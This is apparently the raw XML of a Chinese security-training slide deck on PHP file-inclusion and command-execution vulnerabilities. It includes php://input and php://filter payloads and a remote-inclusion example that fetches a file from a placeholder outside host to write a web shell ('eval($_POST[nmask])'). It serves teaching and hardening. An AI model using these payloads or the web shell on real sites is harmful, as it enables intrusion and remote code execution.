                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_fopen=On</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>并且 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_include=On)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E2CA94E-3992-420A-86E3-A63EE411B2B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675533" y="2375584"/>
            <a:ext cx="2287806" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>流 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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25DAA1D-040D-4570-B2B8-710ACA97CDF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2755235"/>
            <a:ext cx="60960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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=php://input</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_include=On)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FDF38C7-4FCB-4F0F-BD81-ACB0FF3A1473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404196" y="3669500"/>
            <a:ext cx="3403496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b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>流 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>： 后面实例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/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0EA0602-2E93-4E6C-A5FA-C374590CB347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624069" y="4056272"/>
            <a:ext cx="6096000" cy="139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888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>?file=php://filter/convert.base64-encode/resource=index.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_include=On)</a:t>
            </a:r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9172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0E4A0-7C15-43F3-AC1A-A948D56F4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文件包含远程包含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shell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F3A6F1-B469-4A7B-9064-140972D62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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>9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0D0452-390F-4833-95AD-C29088A3F03D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604728" y="1446530"/>
            <a:ext cx="5480988" cy="396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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件，可以保存在远程服务器上，内容如下：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CF81929-15C9-4D80-815D-914C4A1C09F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2020954"/>
            <a:ext cx="9450469" cy="394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CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;?fputs(fopen(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="99CC99"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"shell.php"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="99CC99"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"w"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="99CC99"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"&lt;?php eval(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="F2777A"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="99CC99"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[nmask]);?&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)?&gt;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501B5D3-0DA4-486D-92DC-D402DDAAA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392876" y="2595379"/>
            <a:ext cx="11478826" cy="106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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>　如果目标网站存在远程包含漏洞，则可以通过访问：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1">
                <a:solidFill>
                  <a:srgbClr val="0593D3"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>则会在服务器根目录下生产一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: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1ADDC96-A7BF-48E0-A067-6D810C32C0DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570719" y="3588852"/>
            <a:ext cx="6096000" cy="72660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br>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="F99157"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="F2777A"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[nmask]);?&gt;</a:t>
            </a:r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58417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95c9de48-0f76-44ec-9d4a-88920333c59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" val="Nordri Tools"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="主题5">
  <a:themeElements>
    <a:clrScheme name="01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34F56"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F34F56"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5A6C90"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="434F5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A5A5A5"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="44546A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F34F56"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="BFBFBF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="bjsstxh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158</TotalTime>
  <Words>1117</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>150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-apple-system</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>主题5</vt:lpstr>
      <vt:lpstr>文件包含和命令执行 </vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>文件包含漏洞如何产生</vt:lpstr>
      <vt:lpstr>常见文件包含函数</vt:lpstr>
      <vt:lpstr>文件包含漏洞分类</vt:lpstr>
      <vt:lpstr>文件包含漏洞攻击方式</vt:lpstr>
      <vt:lpstr>系统重要文件</vt:lpstr>
      <vt:lpstr>远程文件包含漏洞</vt:lpstr>
      <vt:lpstr>文件包含远程包含shell</vt:lpstr>
      <vt:lpstr>文件包含实例</vt:lpstr>
      <vt:lpstr>文件包含实例</vt:lpstr>
      <vt:lpstr>文件包含实例</vt:lpstr>
      <vt:lpstr>文件包含漏洞 php流input</vt:lpstr>
      <vt:lpstr>文件包含之php filter</vt:lpstr>
      <vt:lpstr>有限制的文件包含</vt:lpstr>
      <vt:lpstr>文件包含漏洞加固</vt:lpstr>
      <vt:lpstr>命令执行漏洞 产生原因</vt:lpstr>
      <vt:lpstr>命令执行漏洞 php调用外部程序函数</vt:lpstr>
      <vt:lpstr>命令执行实例</vt:lpstr>
      <vt:lpstr>命令执行实例</vt:lpstr>
      <vt:lpstr>命令执行 写shell</vt:lpstr>
      <vt:lpstr>命令执行加固</vt:lpstr>
      <vt:lpstr>thanks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YA DAI</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <cp:lastPrinted>2017-08-20T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-20T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-09T14:48:25Z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95c9de48-0f76-44ec-9d4a-88920333c593</vt:lpwstr>
  </property>
</Properties>
</file>